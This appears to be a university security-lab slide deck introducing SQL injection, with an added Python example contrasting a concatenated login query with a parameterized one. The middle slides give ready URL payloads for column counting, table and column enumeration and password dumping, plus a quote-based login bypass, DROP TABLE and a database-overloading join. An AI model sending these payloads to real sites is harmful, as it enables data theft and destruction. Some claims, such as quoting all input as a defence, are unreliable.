7/28/2019 A brief Introduction to SQL Injection
Security Lab, University Putra Malaysia
23 May 2013
Sina Manavi
Contact: http://sinamanavi.blogspot.com/p/about-me.html
Introduction
Why SQL Injection
What is needed for this
What you can do with SQL Injection
What are its pros and cons
Why we need to know about it and how we can prevent our database from SQL injection attacks
We are all familiar with the SQL language.
It is one of the technologies that helped convert the static web into a dynamic one.
SQL is relatively easy to read and a little more difficult to write.
It works on servers such as Apache, MS Server, etc.
SQL Injection means manipulating SQL tables with unauthorized access.
SQL Injection happens in only two forms, UI based or URL based:
(1) Injecting into a form, such as the username and password boxes on a login page.
(2) Injecting into a URL, like http://yourtarget.com/products/list.php?pid=10
Simple example:
Select ID from tbl_users Where ID=Uid and pass=pass
If it returns any value, it means that the current inputs are correct.
www.yourtarget.com/list?id=5
If you want to view a record from a table, the URL based request runs a query like:
Select * from tbl_users Where id=5
The "INFORMATION_SCHEMA" holds the names of every table and column on a site; its name never changes.
Table holding all the table names: "INFORMATION_SCHEMA.TABLES"
Table holding all the column names: "INFORMATION_SCHEMA.COLUMNS"
Finding the column count: www.yourtarget.com/list.php?ID=10+ORDER+BY+1--
Increase the 1 until you get an error; the last number that worked is the column count.
Finding the table name: www.yourtarget.com/list.php?ID=-1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES--
And it shows: tbl_user
To be continued
Now it is time to find out the column names: www.yourtarget.com/list.php?ID=
-1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name='tbl_user'--
The result would be as follows:
id,username,password
Column name finding step: www.yourtarget.com/list.php?ID=
-1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name='UserAccounts'+AND+column_name>'displayed_column'
Try the column names until you find your target (e.g. username, password, or login).
And finally it is time to see the records: www.yourtarget.com/list.php?ID=-1+UNION+SELECT+1,username,3+FROM+UserAccounts
And www.yourtarget.com/list.php?ID=-1+UNION+SELECT+1,password,3+FROM+UserAccounts
Username=admin password=123456
Stupid admin ha ;)
Now we can alter the records as well, let's rock:
UPDATE tbl_user
SET password = SHA2('$password')
WHERE id = $id
Or we can insert a new user with the Insert command.
If user_list contains 1000 records, then the database is overloaded by a query like:
SELECT * FROM user_list JOIN user_list
JOIN user_list JOIN user_list JOIN user_list JOIN user_list
Insert newuser into tbl_user
The malicious code can be:
DROP table tbl_user
How it works
Select * from tbl_users
Where id=Fname and pass=pass
Malicious code:
SELECT * FROM table WHERE id= Fname' or '1'='1';
if(mysql_num_rows($result))
//do login
Now the unauthorized user gets access easily and bypasses the authorization.
Security is the developer's job. No database, connector, or framework can prevent SQL injection all the time.
Implement proper error handling. This would include using a single error message for all errors.
Lock down the user database configuration: specify users, roles, permissions, etc.
Prefix and append a quote to all user input, even if the data is numeric.
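The login bypass from the "How it works" slide and the prevention advice above, as an added example that is not from the slides: the same login query built by string concatenation beside a parameterized version, run against an in-memory SQLite table tbl_users with constructed sample rows (the names make_db, login_vulnerable and login_parameterized are assumptions, not the deck's code).

```python
"""Vulnerable string-built login query beside its parameterized form.
Added example, not from the slides; uses an in-memory SQLite table
tbl_users filled with constructed sample data."""
import sqlite3


def make_db():
    # Constructed sample data: one account with the deck's weak password.
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE tbl_users (id INTEGER PRIMARY KEY, username TEXT, pass TEXT)"
    )
    con.execute("INSERT INTO tbl_users VALUES (1, 'admin', '123456')")
    con.commit()
    return con


def login_vulnerable(con, username, password):
    # The slide's pattern: input pasted straight into the SQL text, so a
    # quote in the input changes the structure of the WHERE clause.
    sql = ("SELECT id FROM tbl_users WHERE username = '" + username
           + "' AND pass = '" + password + "'")
    return con.execute(sql).fetchone() is not None


def login_parameterized(con, username, password):
    # Fix: the SQL text is constant and the driver binds the values, so a
    # quote or an OR clause in the input is only compared as data.
    sql = "SELECT id FROM tbl_users WHERE username = ? AND pass = ?"
    return con.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    bypass = "' or '1'='1"  # the payload shown on the "How it works" slide
    print("concatenated, bypass payload:", login_vulnerable(db, "admin", bypass))
    print("parameterized, bypass payload:", login_parameterized(db, "admin", bypass))
    print("parameterized, real password:", login_parameterized(db, "admin", "123456"))
```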
Vipin Samar, Oracle vice president of Database Security:
"Database Firewall is a good first layer of defense for databases but it won't protect you from everything."
Using stored procedures:
CREATE PROCEDURE SP_show_user(IN U_ID INT)
BEGIN
SELECT * FROM Bugs WHERE User_ID = U_ID;
END
CALL SP_show_user(54)
Might be helpful, but still vulnerable.
I don't have to worry anymore
Escaping is the fix
More escaping is better
I can code an escaping function
Only user input is unsafe
Stored procs are the fix
SQL privileges are the fix
My app doesn't need security
Frameworks are the fix
Parameters quote for you
Parameters are the fix
Parameters make queries slow
SQL proxies are the fix
NoSQL databases are the fix
NoSQL databases are immune to SQL injection.